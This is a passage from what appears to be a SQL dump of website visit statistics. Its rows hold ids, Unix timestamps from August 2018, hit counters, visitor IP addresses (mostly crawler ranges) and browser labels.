,1,1,0,0,'54.36.148.81','other'),(281091,1533198534,1,1,0,0,'54.36.148.212','other'),(281092,1533198545,4,4,0,0,'216.244.66.241','other'),(281093,1533198646,1,1,0,0,'54.36.149.98','other'),(281094,1533198774,1,1,0,0,'54.36.149.30','other'),(281095,1533198842,1,1,0,0,'54.36.149.106','other'),(281096,1533199082,1,1,0,0,'54.36.149.82','other'),(281097,1533199198,1,1,0,0,'54.36.148.66','other'),(281098,1533199354,1,1,0,0,'54.36.149.80','other'),(281099,1533199449,1,1,0,0,'54.36.148.234','other'),(281100,1533199534,1,1,0,0,'178.154.171.88','other'),(281101,1533199762,1,1,0,0,'66.249.66.156','chrome'),(281102,1533200017,1,1,0,0,'54.36.148.108','other'),(281103,1533200320,1,1,0,0,'54.36.149.11','other'),(281104,1533200448,1,1,0,0,'95.133.248.139','firefox'),(281105,1533200531,1,0,1,0,'66.249.66.157',''),(281106,1533200543,1,1,0,0,'54.36.148.126','other'),(281107,1533200695,1,1,0,0,'54.36.148.146','other'),(281108,1533200875,3,0,3,0,'66.249.66.156',''),(281109,1533200912,1,1,0,0,'207.46.13.38','other'),(281110,1533200925,1,1,0,0,'54.36.148.38','other'),(281111,1533200972,1,1,0,0,'54.36.148.39','other'),(281112,1533201144,1,1,0,0,'91.196.178.80','chrome'),(281113,1533201465,1,1,0,0,'54.36.148.21','other'),(281114,1533201573,1,1,0,0,'54.36.148.224','other'),(281115,1533201729,1,1,0,0,'8.29.198.27','other'),(281116,1533201955,1,1,0,0,'54.36.148.225','other'),(281117,1533202025,1,1,0,0,'54.36.148.194','other'),(281118,1533202116,1,1,0,0,'54.36.148.70','other'),(281119,1533202276,1,0,1,0,'66.249.66.155',''),(281120,1533202296,1,1,0,0,'54.36.148.236','other'),(281121,1533202377,3,0,3,0,'66.249.66.156',''),(281122,1533202411,2,2,0,0,'91.196.178.172','chrome'),(281123,1533202479,1,1,0,0,'54.36.148.15','other'),(281124,1533202611,1,1,0,0,'54.36.148.138','other'),(281125,1533202653,1,1,0,0,'54.36.149.2','other'),(281126,1533202833,1,1,0,0,'54.36.148.244','other'),(281127,1533202894,1,1,0,0,'54.36.149.3','other'),(281128,1533203211,2,2,0,0,'95.132.58.195','chrome'),(281129,1533203317,1,1,0,0,'8.29.198.26','other'),(281130,1533203396,1,1,0,0,'54.36.149.57','other'),(281131,1533203400,1,0,1,0,'66.249.66.156',''),(281132,1533203406,1,0,1,0,'66.249.66.155',''),(281133,1533203554,1,1,0,0,'54.36.148.43','other'),(281134,1533203908,1,1,0,0,'37.9.113.157','other'),(281135,1533204145,1,1,0,0,'54.36.149.35','other'),(281136,1533204359,1,1,0,0,'91.196.178.75','firefox'),(281137,1533204369,1,1,0,0,'54.36.148.47','other'),(281138,1533204620,1,1,0,0,'54.36.148.190','other'),(281139,1533204676,1,1,0,0,'54.36.148.88','other'),(281140,1533204732,1,1,0,0,'54.36.149.71','other'),(281141,1533205168,1,1,0,0,'54.36.148.203','other'),(281142,1533205390,1,0,1,0,'66.249.66.156',''),(281143,1533205432,1,1,0,0,'66.249.66.155','chrome'),(281144,1533205765,1,1,0,0,'195.211.174.50','chrome'),(281145,1533205953,2,2,0,0,'91.196.178.75','firefox'),(281146,1533206056,1,1,0,0,'54.36.148.197','other'),(281147,1533206065,1,1,0,0,'54.36.148.252','other'),(281148,1533206198,1,1,0,0,'54.36.148.178','other'),(281149,1533206237,1,1,0,0,'54.36.148.39','other'),(281150,1533206350,1,1,0,0,'54.36.148.134','other'),(281151,1533206386,1,1,0,0,'54.36.148.152','other'),(281152,1533206397,1,1,0,0,'54.36.149.10','other'),(281153,1533206500,1,1,0,0,'95.163.255.96','other'),(281154,1533206695,3,3,0,0,'216.244.66.241','other'),(281155,1533206846,1,1,0,0,'54.36.149.64','other'),(281156,1533206950,1,1,0,0,'54.36.148.160','other'),(281157,1533207507,1,1,0,0,'54.36.148.97','other'),(281158,1533207572,1,1,0,0,'54.36.148.129','other'),(281159,1533207665,1,1,0,0,'54.36.149.94','other'),(281160,1533207691,1,1,0,0,'54.36.149.4','other'),(281161,1533207705,1,1,0,0,'54.36.149.72','other'),(281162,1533207736,1,1,0,0,'54.36.149.103','other'),(281163,1533208538,1,1,0,0,'77.111.244.23','chrome'),(281164,1533208597,1,0,1,0,'66.249.66.156',''),(281165,1533208669,2,2,0,0,'188.231.221.9','chrome'),(281166,1533208857,1,1,0,0,'157.55.39.210','other'),(281167,1533209098,1,1,0,0,'54.36.148.222','other'),(281168,1533209334,5,5,0,0,'216.244.66.241','other'),(281169,1533209746,1,1,0,0,'193.151.240.60','chrome'),(281170,1533209855,1,1,0,0,'87.250.224.46','other'),(281171,1533209868,1,1,0,0,'54.36.148.169','other'),(281172,1533209980,1,1,0,0,'54.36.148.85','other'),(281173,1533210022,1,1,0,0,'91.196.178.75','firefox'),(281174,1533210054,1,1,0,0,'54.36.148.40','other'),(281175,1533210089,1,1,0,0,'54.36.149.73','other'),(281176,1533210197,1,1,0,0,'54.36.148.108','other'),(281177,1533210273,1,1,0,0,'54.36.148.197','other'),(281178,1533210282,1,1,0,0,'54.36.148.203','other'),(281179,1533210489,3,3,0,0,'91.196.177.46','chrome'),(281180,1533210666,1,1,0,0,'54.36.148.29','other'),(281181,1533210973,1,1,0,0,'91.196.178.179','chrome'),(281182,1533211087,1,1,0,0,'54.36.148.133','other'),(281183,1533211114,1,1,0,0,'54.36.148.228','other'),(281184,1533211365,1,1,0,0,'54.36.148.171','other'),(281185,1533211404,1,1,0,0,'91.196.177.46','chrome'),(281186,1533211563,1,1,0,0,'54.36.148.103','other'),(281187,1533211735,1,1,0,0,'207.46.13.39','other'),(281188,1533211901,2,2,0,0,'92.112.125.37','chrome'),(281189,1533211926,1,1,0,0,'216.244.66.241','other'),(281190,1533211937,1,1,0,0,'91.196.178.80','chrome'),(281191,1533211997,1,1,0,0,'54.36.148.221','other'),(281192,1533212052,1,1,0,0,'141.8.142.74','other'),(281193,1533212200,1,1,0,0,'54.36.148.194','other'),(281194,1533212359,1,1,0,0,'54.36.148.241','other'),(281195,1533212544,1,1,0,0,'54.36.148.177','other'),(281196,1533212559,1,1,0,0,'95.163.255.170','other'),(281197,1533212620,1,1,0,0,'8.29.198.25','other'),(281198,1533213045,1,1,0,0,'46.211.158.173','other'),(281199,1533213190,1,1,0,0,'46.211.248.101','chrome'),(281200,1533213850,1,1,0,0,'95.163.255.98','other'),(281201,1533214042,1,1,0,0,'54.36.148.48','other'),(281202,1533214198,1,1,0,0,'8.29.198.26','other'),(281203,1533214304,1,1,0,0,'54.36.148.180','other'),(281204,1533214338,1,1,0,0,'54.36.149.4','other'),(281205,1533214364,1,1,0,0,'66.249.66.157','chrome'),(281206,1533214437,1,1,0,0,'46.242.145.104','firefox'),(281207,1533214624,1,1,0,0,'54.36.148.210','other'),(281208,1533214681,2,2,0,0,'216.244.66.241','other'),(281209,1533214737,1,1,0,0,'54.36.149.73','other'),(281210,1533214836,1,1,0,0,'54.36.148.204','other'),(281211,1533214904,1,1,0,0,'95.163.255.97','other'),(281212,1533214912,1,1,0,0,'54.36.148.73','other'),(281213,1533214982,1,1,0,0,'54.36.148.78','other'),(281214,1533215005,1,1,0,0,'54.36.149.8','other'),(281215,1533215013,1,1,0,0,'178.210.90.90','firefox'),(281216,1533215351,1,1,0,0,'54.36.149.56','other'),(281217,1533215390,1,1,0,0,'37.54.164.216','chrome'),(281218,1533215610,1,1,0,0,'37.9.113.60','other'),(281219,1533215757,2,2,0,0,'134.249.146.125','chrome'),(281220,1533216061,1,1,0,0,'91.196.178.94','chrome'),(281221,1533216068,1,1,0,0,'81.24.208.122','firefox'),(281222,1533216177,1,1,0,0,'54.36.149.31','other'),(281223,1533216305,1,1,0,0,'54.36.148.112','other'),(281224,1533216450,1,1,0,0,'54.36.148.65','other'),(281225,1533216821,1,1,0,0,'217.76.204.146','firefox'),(281226,1533216873,1,1,0,0,'54.36.148.61','other'),(281227,1533216888,1,1,0,0,'54.36.149.35','other'),(281228,1533217080,1,1,0,0,'54.36.148.91','other'),(281229,1533217247,2,2,0,0,'216.244.66.241','other'),(281230,1533217386,1,1,0,0,'54.36.148.116','other'),(281231,1533217477,1,1,0,0,'54.36.149.61','other'),(281232,1533217484,1,1,0,0,'92.113.43.180','chrome'),(281233,1533217688,1,1,0,0,'91.196.178.169','chrome'),(281234,1533217697,1,1,0,0,'54.36.148.157','other'),(281235,1533217711,1,1,0,0,'54.36.148.132','other'),(281236,1533217756,1,1,0,0,'54.36.148.198','other'),(281237,1533218171,1,1,0,0,'54.36.149.104','other'),(281238,1533218278,1,1,0,0,'54.36.148.90','other'),(281239,1533218374,1,1,0,0,'91.196.178.75','firefox'),(281240,1533218400,1,1,0,0,'54.36.149.71','other'),(281241,1533218516,1,1,0,0,'54.36.148.106','other'),(281242,1533218905,1,0,1,0,'66.249.66.157',''),(281243,1533218964,1,1,0,0,'54.165.59.7','other'),(281244,1533219091,1,1,0,0,'54.36.148.56','other'),(281245,1533219098,1,0,1,0,'66.249.66.156',''),(281246,1533219216,1,1,0,0,'54.36.149.8','other'),(281247,1533219353,2,2,0,0,'89.184.68.26','other'),(281248,1533219795,4,4,0,0,'216.244.66.241','other'),(281249,1533219822,1,1,0,0,'46.211.3.112','chrome'),(281250,1533220031,1,1,0,0,'54.36.148.172','other'),(281251,1533220209,1,1,0,0,'54.36.148.162','other'),(281252,1533220232,1,1,0,0,'54.36.148.16','other'),(281253,1533220365,1,1,0,0,'54.36.148.220','other'),(281254,1533220477,1,1,0,0,'54.36.149.46','other'),(281255,1533220624,1,1,0,0,'54.36.148.36','other'),(281256,1533220723,1,1,0,0,'54.36.148.143','other'),(281257,1533220841,1,1,0,0,'54.36.148.42','other'),(281258,1533220938,1,1,0,0,'54.36.148.188','other'),(281259,1533221051,1,1,0,0,'87.250.224.125','other'),(281260,1533221505,1,1,0,0,'54.36.148.67','other'),(281261,1533221526,1,1,0,0,'54.36.148.86','other'),(281262,1533221812,3,3,0,0,'216.244.66.241','other'),(281263,1533222427,1,0,1,0,'66.249.66.155',''),(281264,1533222459,1,1,0,0,'54.36.149.63','other'),(281265,1533222708,1,1,0,0,'54.36.148.230','other'),(281266,1533222729,1,1,0,0,'216.244.66.241','other'),(281267,1533222735,2,2,0,0,'95.163.255.95','other'),(281268,1533223214,1,1,0,0,'54.36.149.85','other'),(281269,1533223255,1,1,0,0,'54.36.149.11','other'),(281270,1533223421,1,1,0,0,'54.36.148.236','other'),(281271,1533223474,1,1,0,0,'54.36.149.64','other'),(281272,1533223501,1,1,0,0,'8.29.198.25','other'),(281273,1533223549,1,1,0,0,'188.230.43.254','other'),(281274,1533223677,1,1,0,0,'54.36.148.223','other'),(281275,1533223745,1,1,0,0,'54.36.148.196','other'),(281276,1533223769,1,1,0,0,'54.165.59.7','other'),(281277,1533224078,1,1,0,0,'54.36.149.73','other'),(281278,1533224089,1,0,1,0,'66.249.66.157',''),(281279,1533224090,1,0,1,0,'66.249.66.57',''),(281280,1533224854,2,2,0,0,'216.244.66.241','other'),(281281,1533224909,1,1,0,0,'54.36.148.58','other'),(281282,1533224921,1,1,0,0,'54.36.148.211','other'),(281283,1533224975,1,1,0,0,'46.211.7.224','chrome'),(281284,1533225023,1,1,0,0,'54.36.148.51','other'),(281285,1533225094,1,1,0,0,'8.29.198.26','other'),(281286,1533225423,1,1,0,0,'54.36.149.106','other'),(281287,1533225439,1,1,0,0,'188.230.43.254','other'),(281288,1533225690,1,1,0,0,'54.36.149.105','other'),(281289,1533225791,1,1,0,0,'216.244.66.241','other'),(281290,1533225818,3,3,0,0,'148.251.69.139','other'),(281291,1533226082,1,1,0,0,'54.36.148.222','other'),(281292,1533226152,4,4,0,0,'195.201.115.233','other'),(281293,1533226229,1,1,0,0,'54.36.148.165','other'),(281294,1533226358,1,1,0,0,'54.36.149.35','other'),(281295,1533226361,1,1,0,0,'54.36.149.69','other'),(281296,1533226635,1,1,0,0,'54.36.148.116','other'),(281297,1533226728,1,1,0,0,'216.244.66.241','other'),(281298,1533226842,1,1,0,0,'141.8.142.74','other'),(281299,1533226858,1,1,0,0,'54.36.149.70','other'),(281300,1533226913,1,1,0,0,'95.163.255.95','other'),(281301,1533226992,1,1,0,0,'54.36.148.101','other'),(281302,1533227081,1,1,0,0,'54.36.149.96','other'),(281303,1533227299,1,1,0,0,'54.36.148.204','other'),(281304,1533227351,1,1,0,0,'91.196.178.78','firefox'),(281305,1533227657,1,1,0,0,'54.36.149.47','other'),(281306,1533227757,1,1,0,0,'54.36.149.48','other'),(281307,1533227857,1,1,0,0,'188.230.43.254','other'),(281308,1533227858,2,2,0,0,'141.8.142.74','other'),(281309,1533227859,3,3,0,0,'216.244.66.241','other'),(281310,1533227958,1,1,0,0,'91.209.11.236','other'),(281311,1533228209,5,0,5,0,'66.249.66.156',''),(281312,1533228241,1,0,1,0,'66.249.66.157',''),(281313,1533228340,1,1,0,0,'54.36.148.141','other'),(281314,1533228639,1,1,0,0,'87.250.224.46','other'),(281315,1533228641,1,1,0,0,'54.36.148.107','other'),(281316,1533228712,1,0,1,0,'66.249.66.155',''),(281317,1533228904,1,1,0,0,'54.36.149.47','other'),(281318,1533229007,1,1,0,0,'54.36.149.82','other'),(281319,1533229043,1,1,0,0,'54.36.149.34','other'),(281320,1533229045,1,1,0,0,'54.36.149.23','other'),(281321,1533229241,1,1,0,0,'54.36.148.247','other'),(281322,1533229677,2,0,2,0,'66.249.66.155',''),(281323,1533229748,1,0,1,0,'66.249.66.157',''),(281324,1533229765,1,1,0,0,'54.36.149.101','other'),(281325,1533229888,1,1,0,0,'66.249.66.155','chrome'),(281326,1533230053,1,0,1,0,'66.249.66.61',''),(281327,1533230153,1,1,0,0,'188.230.43.254','other'),(281328,1533230304,1,1,0,0,'54.36.148.86','other'),(281329,1533230366,1,1,0,0,'54.36.148.63','other'),(281330,1533230431,1,1,0,0,'216.244.66.241','other'),(281331,1533230632,1,1,0,0,'157.55.39.210','other'),(281332,1533230726,1,1,0,0,'54.36.148.45','other'),(281333,1533230795,1,1,0,0,'54.36.148.184','other'),(281334,1533230838,1,1,0,0,'95.163.255.166','other'),(281335,1533231198,1,1,0,0,'54.36.148.36','other'),(281336,1533231318,2,2,0,0,'91.196.178.56','chrome'),(281337,1533231338,1,1,0,0,'54.36.148.200','other'),(281338,1533231459,1,1,0,0,'54.36.149.0','other'),(281339,1533231497,8,8,0,0,'178.151.245.174','other'),(281340,1533231859,1,1,0,0,'54.36.148.211','other'),(281341,1533232181,1,1,0,0,'95.132.26.112','chrome'),(281342,1533232350,1,0,1,0,'66.249.66.157',''),(281343,1533232351,2,2,0,0,'54.36.148.81','other'),(281344,1533232393,2,2,0,0,'95.163.255.95','other'),(281345,1533232503,1,0,1,0,'66.249.66.57',''),(281346,1533232528,1,1,0,0,'188.230.43.254','other'),(281347,1533232582,1,1,0,0,'216.244.66.241','other'),(281348,1533232596,2,0,2,0,'66.249.66.155',''),(281349,1533232758,1,1,0,0,'54.36.148.244','other'),(281350,1533232877,3,0,3,0,'66.249.66.156',''),(281351,1533233319,1,1,0,0,'95.163.255.99','other'),(281352,1533233608,1,1,0,0,'54.36.148.209','other'),(281353,1533233729,1,1,0,0,'54.36.148.235','other'),(281354,1533234074,1,1,0,0,'54.36.148.215','other'),(281355,1533234101,1,1,0,0,'54.36.148.129','other'),(281356,1533234231,1,1,0,0,'54.36.148.37','other'),(281357,1533234365,1,1,0,0,'8.29.198.26','other'),(281358,1533234635,1,1,0,0,'54.36.148.93','other'),(281359,1533234770,1,1,0,0,'207.46.13.39','other'),(281360,1533234953,1,1,0,0,'95.163.255.94','other'),(281361,1533235061,2,0,2,0,'66.249.66.155',''),(281362,1533235065,3,3,0,0,'216.244.66.241','other'),(281363,1533235112,1,1,0,0,'54.36.149.95','other'),(281364,1533235383,1,0,1,0,'66.249.66.157',''),(281365,1533235442,1,1,0,0,'87.250.224.96','other'),(281366,1533235518,1,1,0,0,'54.36.148.20','other'),(281367,1533235780,1,1,0,0,'54.36.148.98','other'),(281368,1533235781,1,1,0,0,'54.36.148.174','other'),(281369,1533235972,1,1,0,0,'8.29.198.26','other'),(281370,1533236034,1,1,0,0,'54.36.148.185','other'),(281371,1533236043,1,1,0,0,'54.36.148.83','other'),(281372,1533236168,1,1,0,0,'66.249.66.157','chrome'),(281373,1533236761,1,1,0,0,'207.46.13.39','other'),(281374,1533236798,1,1,0,0,'37.55.57.227','other'),(281375,1533236898,1,1,0,0,'54.36.148.146','other'),(281376,1533236926,1,1,0,0,'54.36.149.97','other'),(281377,1533237028,1,1,0,0,'37.9.113.182','other'),(281378,1533237153,1,1,0,0,'54.36.149.105','other'),(281379,1533237271,1,1,0,0,'141.8.132.22','other'),(281380,1533237356,1,1,0,0,'54.36.149.80','other'),(281381,1533237544,1,1,0,0,'54.36.148.214','other'),(281382,1533237632,2,2,0,0,'216.244.66.241','other'),(281383,1533237686,1,1,0,0,'54.36.149.20','other'),(281384,1533237734,1,1,0,0,'95.163.255.98','other'),(281385,1533237760,1,1,0,0,'54.36.148.196','other'),(281386,1533237779,1,1,0,0,'54.36.148.138','other'),(281387,1533237826,1,1,0,0,'54.36.148.128','other'),(281388,1533237921,1,1,0,0,'54.36.148.153','other'),(281389,1533238342,7,7,0,0,'207.46.13.39','other'),(281390,1533238372,1,0,1,0,'66.249.66.155',''),(281391,1533238411,1,1,0,0,'54.36.148.195','other'),(281392,1533238692,1,1,0,0,'54.36.148.79','other'),(281393,1533238705,3,3,0,0,'207.46.13.36','other'),(281394,1533238709,4,4,0,0,'207.46.13.38','other'),(281395,1533238722,4,4,0,0,'157.55.39.210','other'),(281396,1533239130,1,1,0,0,'54.36.148.144','other'),(281397,1533239201,1,1,0,0,'54.36.149.86','other'),(281398,1533239501,1,1,0,0,'54.36.149.50','other'),(281399,1533239780,1,1,0,0,'54.36.148.73','other'),(281400,1533239988,1,1,0,0,'54.36.149.20','other'),(281401,1533240354,3,3,0,0,'216.244.66.241','other'),(281402,1533240433,1,1,0,0,'193.0.218.131','other'),(281403,1533240472,1,1,0,0,'54.36.149.90','other'),(281404,1533240500,1,0,1,0,'66.249.66.156',''),(281405,1533240502,1,1,0,0,'54.36.148.254','other'),(281406,1533240579,2,0,2,0,'66.249.66.155',''),(281407,1533240941,1,1,0,0,'54.36.149.62','other'),(281408,1533240960,1,1,0,0,'54.36.148.161','other'),(281409,1533241330,1,1,0,0,'54.36.148.17','other'),(281410,1533241342,1,0,1,0,'66.249.66.157',''),(281411,1533241498,1,1,0,0,'37.9.113.138','other'),(281412,1533241614,1,1,0,0,'54.36.148.70','other'),(281413,1533241931,1,1,0,0,'54.36.149.9','other'),(281414,1533241936,1,1,0,0,'54.36.148.65','other'),(281415,1533242030,1,1,0,0,'54.36.148.23','other'),(281416,1533242063,1,1,0,0,'5.45.207.58','other'),(281417,1533242177,1,1,0,0,'54.36.148.150','other'),(281418,1533242462,1,1,0,0,'54.36.148.55','other'),(281419,1533242650,1,1,0,0,'54.36.148.216','other'),(281420,1533242733,1,1,0,0,'87.250.224.46','other'),(281421,1533242737,1,1,0,0,'54.36.148.111','other'),(281422,1533243018,1,1,0,0,'54.36.148.105','other'),(281423,1533243027,1,1,0,0,'72.29.73.51','firefox'),(281424,1533243088,1,1,0,0,'54.36.149.32','other'),(281425,1533243125,1,1,0,0,'37.9.113.151','other'),(281426,1533243248,1,1,0,0,'216.244.66.241','other'),(281427,1533243533,1,0,1,0,'66.249.66.157',''),(281428,1533243708,1,1,0,0,'54.36.148.118','other'),(281429,1533243868,1,1,0,0,'54.36.148.211','other'),(281430,1533244214,1,1,0,0,'54.36.148.97','other'),(281431,1533244342,1,1,0,0,'54.36.148.33','other'),(281432,1533244789,1,1,0,0,'66.249.66.156','chrome'),(281433,1533245215,1,1,0,0,'8.29.198.27','other'),(281434,1533245492,2,2,0,0,'91.121.86.136','other'),(281435,1533245896,1,1,0,0,'216.244.66.241','other'),(281436,1533246506,1,1,0,0,'54.36.149.47','other'),(281437,1533246835,1,1,0,0,'8.29.198.27','other'),(281438,1533246983,1,1,0,0,'142.93.67.107','chrome'),(281439,1533247079,1,0,1,0,'66.249.66.156',''),(281440,1533247224,1,1,0,0,'54.36.148.152','other'),(281441,1533247275,1,1,0,0,'54.36.149.36','other'),(281442,1533247446,1,1,0,0,'54.36.148.254','other'),(281443,1533247729,1,0,1,0,'66.249.66.155',''),(281444,1533247734,2,2,0,0,'216.244.66.241','other'),(281445,1533248120,1,1,0,0,'54.36.149.3','other'),(281446,1533248174,1,1,0,0,'54.36.148.61','other'),(281447,1533248179,1,1,0,0,'5.45.207.58','other'),(281448,1533248190,1,1,0,0,'54.36.148.35','other'),(281449,1533248559,1,1,0,0,'95.163.255.96','other'),(281450,1533248650,1,1,0,0,'54.36.148.180','other'),(281451,1533248689,1,1,0,0,'54.36.148.13','other'),(281452,1533248818,1,1,0,0,'54.36.149.73','other'),(281453,1533249140,1,1,0,0,'54.36.149.7','other'),(281454,1533249229,1,1,0,0,'54.36.148.30','other'),(281455,1533249538,1,1,0,0,'54.36.148.217','other'),(281456,1533249834,1,1,0,0,'95.163.255.175','other'),(281457,1533249917,1,1,0,0,'95.163.255.169','other'),(281458,1533249935,2,0,2,0,'66.249.66.156',''),(281459,1533250009,1,0,1,0,'66.249.66.155',''),(281460,1533250252,1,1,0,0,'54.36.148.30','other'),(281461,1533250327,1,1,0,0,'54.36.149.76','other'),(281462,1533250762,1,1,0,0,'54.36.148.33','other'),(281463,1533250894,1,1,0,0,'54.36.148.245','other'),(281464,1533250984,1,0,1,0,'66.249.66.157',''),(281465,1533250991,1,1,0,0,'54.36.148.37','other'),(281466,1533251175,1,1,0,0,'54.36.148.173','other'),(281467,1533251255,2,2,0,0,'54.90.10.104','chrome'),(281468,1533251267,1,1,0,0,'54.36.148.145','other'),(281469,1533251342,1,1,0,0,'54.36.148.68','other'),(281470,1533251782,1,1,0,0,'54.36.148.46','other'),(281471,1533252059,1,1,0,0,'54.36.148.214','other'),(281472,1533252131,1,1,0,0,'54.36.148.104','other'),(281473,1533252228,1,1,0,0,'54.36.148.84','other'),(281474,1533252317,2,0,2,0,'66.249.66.157',''),(281475,1533252365,1,1,0,0,'54.36.149.12','other'),(281476,1533252419,1,1,0,0,'54.36.149.98','other'),(281477,1533252434,1,0,1,0,'66.249.66.156',''),(281478,1533252728,1,1,0,0,'54.36.148.142','other'),(281479,1533253140,4,4,0,0,'216.244.66.241','other'),(281480,1533253322,1,0,1,0,'66.249.66.155',''),(281481,1533253366,1,1,0,0,'66.249.66.155','chrome'),(281482,1533253426,1,1,0,0,'54.36.148.205','other'),(281483,1533253824,1,1,0,0,'54.36.148.180','other'),(281484,1533253848,1,1,0,0,'54.36.148.76','other'),(281485,1533253907,1,1,0,0,'178.154.171.55','other'),(281486,1533254403,1,1,0,0,'54.36.149.12','other'),(281487,1533254572,1,0,1,0,'66.249.66.155',''),(281488,1533254741,1,1,0,0,'54.36.148.10','other'),(281489,1533254892,1,1,0,0,'54.36.148.178','other'),(281490,1533254965,1,1,0,0,'54.36.148.12','other'),(281491,1533255482,1,1,0,0,'216.244.66.241','other'),(281492,1533255994,1,1,0,0,'213.180.203.40','other'),(281493,1533256074,1,1,0,0,'8.29.198.25','other'),(281494,1533256193,2,0,2,0,'66.249.66.156',''),(281495,1533256198,1,0,1,0,'66.249.66.155',''),(281496,1533256254,1,1,0,0,'54.36.149.60','other'),(281497,1533256274,2,0,2,0,'66.249.66.157',''),(281498,1533256435,1,1,0,0,'54.36.148.151','other'),(281499,1533256491,1,1,0,0,'54.36.149.47','other'),(281500,1533256680,1,1,0,0,'54.36.148.215','other'),(281501,1533256719,1,1,0,0,'54.36.148.150','other'),(281502,1533256884,1,1,0,0,'54.36.149.40','other'),(281503,1533256925,1,1,0,0,'54.36.148.213','other'),(281504,1533256983,1,1,0,0,'54.36.149.55','other'),(281505,1533257280,1,1,0,0,'54.36.148.11','other'),(281506,1533257330,1,1,0,0,'207.46.13.38','other'),(281507,1533257675,1,1,0,0,'54.36.148.165','other'),(281508,1533257693,1,1,0,0,'8.29.198.27','other'),(281509,1533257804,2,2,0,0,'216.244.66.241','other'),(281510,1533257925,1,1,0,0,'54.36.148.41','other'),(281511,1533257965,1,0,1,0,'66.249.66.156',''),(281512,1533257988,1,1,0,0,'54.36.148.234','other'),(281513,1533258221,1,1,0,0,'54.36.149.33','other'),(281514,1533258315,1,1,0,0,'54.36.148.132','other'),(281515,1533258409,1,1,0,0,'54.36.148.150','other'),(281516,1533258570,1,1,0,0,'54.36.148.137','other'),(281517,1533258823,1,1,0,0,'54.36.148.135','other'),(281518,1533258866,1,1,0,0,'54.36.148.127','other'),(281519,1533259407,3,0,3,0,'66.249.66.155',''),(281520,1533259500,1,1,0,0,'54.36.148.131','other'),(281521,1533259564,4,0,4,0,'66.249.66.156',''),(281522,1533259652,1,1,0,0,'54.36.148.136','other'),(281523,1533259665,1,0,1,0,'66.249.66.157',''),(281524,1533259820,1,1,0,0,'54.36.148.150','other'),(281525,1533259874,1,1,0,0,'66.249.66.155','chrome'),(281526,1533259877,1,1,0,0,'54.36.148.122','other'),(281527,1533260074,1,1,0,0,'54.36.148.137','other'),(281528,1533260147,1,1,0,0,'54.36.148.80','other'),(281529,1533260275,1,1,0,0,'54.36.149.99','other'),(281530,1533260669,1,1,0,0,'216.244.66.241','other'),(281531,1533260671,1,1,0,0,'54.36.148.65','other'),(281532,1533260917,1,1,0,0,'54.36.149.60','other'),(281533,1533261053,1,1,0,0,'54.36.149.102','other'),(281534,1533261521,1,1,0,0,'54.36.148.92','other'),(281535,1533261662,1,1,0,0,'54.36.148.132','other'),(281536,1533261763,1,1,0,0,'54.36.148.42','other'),(281537,1533262350,1,1,0,0,'52.34.24.33','chrome'),(281538,1533262365,1,0,1,0,'66.249.66.61',''),(281539,1533262543,1,1,0,0,'54.36.148.249','other'),(281540,1533262554,1,1,0,0,'54.36.148.79','other'),(281541,1533262751,5,5,0,0,'148.251.120.201','other'),(281542,1533263129,1,1,0,0,'54.36.148.71','other'),(281543,1533263376,1,1,0,0,'54.36.148.59','other'),(281544,1533263620,1,1,0,0,'54.36.149.9','other'),(281545,1533263721,1,1,0,0,'54.36.148.52','other'),(281546,1533263884,1,1,0,0,'54.36.148.27','other'),(281547,1533264271,1,1,0,0,'54.36.149.8','other'),(281548,1533264439,1,1,0,0,'216.244.66.241','other'),(281549,1533264457,1,1,0,0,'54.36.148.252','other'),(281550,1533264980,1,1,0,0,'54.36.149.67','other'),(281551,1533265058,1,1,0,0,'95.163.255.176','other'),(281552,1533265140,1,1,0,0,'95.163.255.190','other'),(281553,1533265421,1,1,0,0,'54.36.149.87','other'),(281554,1533265626,1,1,0,0,'54.36.149.17','other'),(281555,1533265759,2,2,0,0,'91.196.178.162','chrome'),(281556,1533266042,1,1,0,0,'54.36.148.130','other'),(281557,1533266658,1,1,0,0,'54.36.148.30','other'),(281558,1533266914,1,1,0,0,'8.29.198.26','other'),(281559,1533266969,1,1,0,0,'54.36.148.73','other'),(281560,1533267440,1,1,0,0,'54.36.149.8','other'),(281561,1533267520,1,1,0,0,'54.36.148.110','other'),(281562,1533267533,1,1,0,0,'157.55.39.210','other'),(281563,1533267623,1,1,0,0,'54.36.148.132','other'),(281564,1533267746,1,1,0,0,'54.36.148.149','other'),(281565,1533267881,1,1,0,0,'37.9.113.186','other'),(281566,1533268020,1,1,0,0,'54.36.148.21','other'),(281567,1533268134,6,6,0,0,'167.114.219.41','other'),(281568,1533268184,1,1,0,0,'37.9.113.151','other'),(281569,1533268245,1,1,0,0,'40.77.167.20','other'),(281570,1533268301,1,1,0,0,'216.244.66.241','other'),(281571,1533268315,1,1,0,0,'95.163.255.192','other'),(281572,1533268454,1,1,0,0,'54.36.149.61','other'),(281573,1533268539,1,1,0,0,'8.29.198.25','other'),(281574,1533268580,1,1,0,0,'54.36.149.23','other'),(281575,1533268667,1,1,0,0,'54.36.149.88','other'),(281576,1533268909,1,1,0,0,'54.36.148.131','other'),(281577,1533269063,1,1,0,0,'54.36.148.228','other'),(281578,1533269155,1,1,0,0,'54.36.148.74','other'),(281579,1533269216,1,1,0,0,'54.36.148.183','other'),(281580,1533269260,1,1,0,0,'54.36.148.162','other'),(281581,1533269305,1,1,0,0,'54.36.149.101','other'),(281582,1533269591,1,1,0,0,'54.36.149.18','other'),(281583,1533269608,2,2,0,0,'54.36.148.147','other'),(281584,1533269777,1,1,0,0,'162.210.196.130','other'),(281585,1533269779,1,1,0,0,'54.36.148.215','other'),(281586,1533269836,1,1,0,0,'54.36.148.143','other'),(281587,1533270009,1,1,0,0,'54.36.148.189','other'),(281588,1533270106,1,1,0,0,'54.36.149.54','other'),(281589,1533270308,1,1,0,0,'54.36.149.30','other'),(281590,1533270328,1,1,0,0,'54.36.148.197','other'),(281591,1533270482,1,1,0,0,'54.36.148.142','other'),(281592,1533270938,15,15,0,0,'157.55.39.210','other'),(281593,1533270992,1,1,0,0,'54.36.148.170','other'),(281594,1533271113,25,25,0,0,'207.46.13.39','other'),(281595,1533271138,15,15,0,0,'207.46.13.38','other'),(281596,1533271166,12,12,0,0,'207.46.13.36','other'),(281597,1533271232,1,1,0,0,'54.36.148.140','other'),(281598,1533271495,1,1,0,0,'195.201.34.121','other'),(281599,1533271579,1,1,0,0,'54.36.148.178','other'),(281600,1533271765,1,1,0,0,'54.36.149.101','other'),(281601,1533271784,1,1,0,0,'144.76.6.230','other'),(281602,1533271792,1,1,0,0,'54.36.148.169','other'),(281603,1533271813,1,1,0,0,'54.36.149.3','other'),(281604,1533271956,1,1,0,0,'54.36.148.154','other'),(281605,1533272082,1,1,0,0,'54.36.149.106','other'),(